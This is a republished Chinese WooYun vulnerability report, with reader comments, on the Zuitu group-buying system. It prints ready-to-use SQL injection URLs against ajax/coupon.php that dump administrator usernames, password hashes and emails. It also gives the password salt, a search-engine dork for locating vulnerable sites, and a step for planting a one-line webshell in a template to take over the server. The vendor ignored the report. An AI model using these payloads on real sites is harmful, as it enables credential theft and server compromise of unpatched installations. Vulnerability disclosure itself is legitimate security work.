某团购系统通用注入到Getshell（附poc）

2015年6月12日08:58:00评论381 views字数 230阅读0分46秒阅读模式

摘要

2014-09-09：细节已通知厂商并且等待厂商处理中
2014-09-14：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放（绿盟科技、唐朝安全巡航、无声信息）
2014-11-08：细节向核心白帽子及相关领域专家公开
2014-11-18：细节向普通白帽子公开
2014-11-28：细节向实习白帽子公开
2014-12-05：细节向公众公开

漏洞概要关注数(19) 关注此漏洞

漏洞标题：某团购系统通用注入到Getshell（附poc）

漏洞作者：郭斯特

提交时间： 2014-09-09 09:33

公开时间： 2014-12-05 09:34

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

6人收藏

漏洞详情

披露状态：

简要描述：

test~

详细说明：

最土团购。

基础函数过滤不全导致注射。

ajax/coupon.php

exp：

ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15,16/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23

如果不行换成15位

ajax/coupon.php?action=consume&secret=8&id=2%27)/**/and/**/1=2/**/union/**/select/**/1,2,0,4,5,6,concat(0x31,0x3a,username,0x3a,password,0x3a,email,0x3a),8,9,10,11,9999999999,13,14,15/**/from/**/user/**/where/**/manager=0x59/**/limit/**/0,1%23

加密方式md5(password.'@4!@#$%@')

爆出来的md5后面加上salt（@4!@#$%@）

虽然停止开发了，但是谷歌一下还是有许多人用的。

inurl:about privacy php 团购

漏洞证明：

修复方案：

getshell：

在模板处插入一句话然后连接

版权声明：转载请注明来源郭斯特@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-12-05 09:34

厂商回复：

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2014-09-09 09:41 | nextdoor ( 普通白帽子 | Rank:332 漏洞数:75 | Just for fun)

0

官网都没人维护了，挖了也没人补啊

1# 回复此人
2014-09-09 09:42 | 郭斯特 ( 普通白帽子 | Rank:185 漏洞数:71 | GhostWin)

0

@疯狗 @xsser 最土不更新了。求补rank~

2# 回复此人
2014-12-23 08:11 | 用来怀念 ( 路人 | Rank:0 漏洞数:1 | 不是什么人都一定要去拥有，有的东西最好用...)

1

楼主好，爆出来的是MD5加密的吗？？？？

3# 回复此人
2015-05-13 05:25 | bobbi ( 路人 | Rank:26 漏洞数:9 )

0

@郭斯特爆出来的md5后面加上 @4!@#$%@ 是啥意思？能解开？

4# 回复此人

漏洞概要 关注数(19) 关注此漏洞

缺陷编号： WooYun-2014-75525

漏洞标题： 某团购系统通用注入到Getshell（附poc）

相关厂商： zuitu.com

漏洞作者： 郭斯特